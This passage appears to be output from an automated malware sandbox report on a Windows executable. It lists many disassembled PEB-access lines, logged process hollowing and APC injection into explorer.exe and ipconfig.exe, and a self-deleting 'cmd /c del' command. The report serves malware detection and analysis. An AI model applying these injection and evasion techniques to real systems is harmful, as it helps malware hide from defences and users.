          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E609 mov eax, dword ptr fs:[00000030h]5_2_0179E609
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h]5_2_0179E6F2
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h]5_2_0179E6F2
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h]5_2_0179E6F2
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h]5_2_0179E6F2
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A06F1 mov eax, dword ptr fs:[00000030h]5_2_017A06F1
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A06F1 mov eax, dword ptr fs:[00000030h]5_2_017A06F1
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0175A6C7
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175A6C7 mov eax, dword ptr fs:[00000030h]5_2_0175A6C7
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017566B0 mov eax, dword ptr fs:[00000030h]5_2_017566B0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175C6A6 mov eax, dword ptr fs:[00000030h]5_2_0175C6A6
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01724690 mov eax, dword ptr fs:[00000030h]5_2_01724690
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01724690 mov eax, dword ptr fs:[00000030h]5_2_01724690
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C4978 mov eax, dword ptr fs:[00000030h]5_2_017C4978
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C4978 mov eax, dword ptr fs:[00000030h]5_2_017C4978
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017AC97C mov eax, dword ptr fs:[00000030h]5_2_017AC97C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01746962 mov eax, dword ptr fs:[00000030h]5_2_01746962
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01746962 mov eax, dword ptr fs:[00000030h]5_2_01746962
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01746962 mov eax, dword ptr fs:[00000030h]5_2_01746962
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0176096E mov eax, dword ptr fs:[00000030h]5_2_0176096E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0176096E mov edx, dword ptr fs:[00000030h]5_2_0176096E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0176096E mov eax, dword ptr fs:[00000030h]5_2_0176096E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A0946 mov eax, dword ptr fs:[00000030h]5_2_017A0946
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A892A mov eax, dword ptr fs:[00000030h]5_2_017A892A
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B892B mov eax, dword ptr fs:[00000030h]5_2_017B892B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017AC912 mov eax, dword ptr fs:[00000030h]5_2_017AC912
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01718918 mov eax, dword ptr fs:[00000030h]5_2_01718918
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01718918 mov eax, dword ptr fs:[00000030h]5_2_01718918
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E908 mov eax, dword ptr fs:[00000030h]5_2_0179E908
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E908 mov eax, dword ptr fs:[00000030h]5_2_0179E908
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017529F9 mov eax, dword ptr fs:[00000030h]5_2_017529F9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017529F9 mov eax, dword ptr fs:[00000030h]5_2_017529F9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017AE9E0 mov eax, dword ptr fs:[00000030h]5_2_017AE9E0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017549D0 mov eax, dword ptr fs:[00000030h]5_2_017549D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EA9D3 mov eax, dword ptr fs:[00000030h]5_2_017EA9D3
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B69C0 mov eax, dword ptr fs:[00000030h]5_2_017B69C0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A89B3 mov esi, dword ptr fs:[00000030h]5_2_017A89B3
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A89B3 mov eax, dword ptr fs:[00000030h]5_2_017A89B3
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A89B3 mov eax, dword ptr fs:[00000030h]5_2_017A89B3
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017209AD mov eax, dword ptr fs:[00000030h]5_2_017209AD
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017209AD mov eax, dword ptr fs:[00000030h]5_2_017209AD
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017AE872 mov eax, dword ptr fs:[00000030h]5_2_017AE872
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017AE872 mov eax, dword ptr fs:[00000030h]5_2_017AE872
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B6870 mov eax, dword ptr fs:[00000030h]5_2_017B6870
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B6870 mov eax, dword ptr fs:[00000030h]5_2_017B6870
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01750854 mov eax, dword ptr fs:[00000030h]5_2_01750854
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01724859 mov eax, dword ptr fs:[00000030h]5_2_01724859
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01724859 mov eax, dword ptr fs:[00000030h]5_2_01724859
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01732840 mov ecx, dword ptr fs:[00000030h]5_2_01732840
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01742835 mov ecx, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175A830 mov eax, dword ptr fs:[00000030h]5_2_0175A830
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C483A mov eax, dword ptr fs:[00000030h]5_2_017C483A
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C483A mov eax, dword ptr fs:[00000030h]5_2_017C483A
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017AC810 mov eax, dword ptr fs:[00000030h]5_2_017AC810
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175C8F9 mov eax, dword ptr fs:[00000030h]5_2_0175C8F9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175C8F9 mov eax, dword ptr fs:[00000030h]5_2_0175C8F9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EA8E4 mov eax, dword ptr fs:[00000030h]5_2_017EA8E4
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174E8C0 mov eax, dword ptr fs:[00000030h]5_2_0174E8C0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017AC89D mov eax, dword ptr fs:[00000030h]5_2_017AC89D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01720887 mov eax, dword ptr fs:[00000030h]5_2_01720887
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171CB7E mov eax, dword ptr fs:[00000030h]5_2_0171CB7E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CEB50 mov eax, dword ptr fs:[00000030h]5_2_017CEB50
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017D4B4B mov eax, dword ptr fs:[00000030h]5_2_017D4B4B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017D4B4B mov eax, dword ptr fs:[00000030h]5_2_017D4B4B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B6B40 mov eax, dword ptr fs:[00000030h]5_2_017B6B40
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B6B40 mov eax, dword ptr fs:[00000030h]5_2_017B6B40
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EAB40 mov eax, dword ptr fs:[00000030h]5_2_017EAB40
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C8B42 mov eax, dword ptr fs:[00000030h]5_2_017C8B42
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174EB20 mov eax, dword ptr fs:[00000030h]5_2_0174EB20
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174EB20 mov eax, dword ptr fs:[00000030h]5_2_0174EB20
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E8B28 mov eax, dword ptr fs:[00000030h]5_2_017E8B28
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E8B28 mov eax, dword ptr fs:[00000030h]5_2_017E8B28
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]5_2_01728BF0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]5_2_01728BF0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]5_2_01728BF0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174EBFC mov eax, dword ptr fs:[00000030h]5_2_0174EBFC
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017ACBF0 mov eax, dword ptr fs:[00000030h]5_2_017ACBF0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CEBD0 mov eax, dword ptr fs:[00000030h]5_2_017CEBD0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]5_2_01740BCB
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]5_2_01740BCB
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]5_2_01740BCB
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]5_2_01720BCD
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]5_2_01720BCD
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]5_2_01720BCD
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h]5_2_01730BBE
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h]5_2_01730BBE
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h]5_2_017D4BB0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h]5_2_017D4BB0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h]5_2_0179CA72
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h]5_2_0179CA72
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]5_2_0175CA6F
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]5_2_0175CA6F
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]5_2_0175CA6F
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CEA60 mov eax, dword ptr fs:[00000030h]5_2_017CEA60
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h]5_2_01730A5B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h]5_2_01730A5B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h]5_2_01744A35
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h]5_2_01744A35
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175CA38 mov eax, dword ptr fs:[00000030h]5_2_0175CA38
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175CA24 mov eax, dword ptr fs:[00000030h]5_2_0175CA24
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174EA2E mov eax, dword ptr fs:[00000030h]5_2_0174EA2E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017ACA11 mov eax, dword ptr fs:[00000030h]5_2_017ACA11
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h]5_2_0175AAEE
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h]5_2_0175AAEE
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01720AD0 mov eax, dword ptr fs:[00000030h]5_2_01720AD0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h]5_2_01754AD0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h]5_2_01754AD0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]5_2_01776ACC
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]5_2_01776ACC
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]5_2_01776ACC
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h]5_2_01728AA0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h]5_2_01728AA0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01776AA4 mov eax, dword ptr fs:[00000030h]5_2_01776AA4
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01758A90 mov edx, dword ptr fs:[00000030h]5_2_01758A90
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017F4A80 mov eax, dword ptr fs:[00000030h]5_2_017F4A80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B8D6B mov eax, dword ptr fs:[00000030h]5_2_017B8D6B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01720D59 mov eax, dword ptr fs:[00000030h]5_2_01720D59
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01720D59 mov eax, dword ptr fs:[00000030h]5_2_01720D59
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01720D59 mov eax, dword ptr fs:[00000030h]5_2_01720D59
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01728D59 mov eax, dword ptr fs:[00000030h]5_2_01728D59
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01728D59 mov eax, dword ptr fs:[00000030h]5_2_01728D59
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01728D59 mov eax, dword ptr fs:[00000030h]5_2_01728D59
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00C739FE FormatMessageW,ConvertLengthToIpv4Mask,InetNtopW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,LocalFree,LocalAlloc,GetAdaptersAddresses,LocalFree,7_2_00C739FE
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00C753F0 SetUnhandledExceptionFilter,7_2_00C753F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00C751A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00C751A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeMemory written: C:\Users\user\Desktop\hj3YCvtlg7.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeThread register set: target process: 3504Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3504Jump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: C70000Jump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"Jump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"Jump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hj3YCvtlg7.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00C74ACA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,7_2_00C74ACA
          Source: explorer.exe, 00000006.00000002.3825528277.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1356110369.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.1359952336.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836251529.0000000004480000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3825528277.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
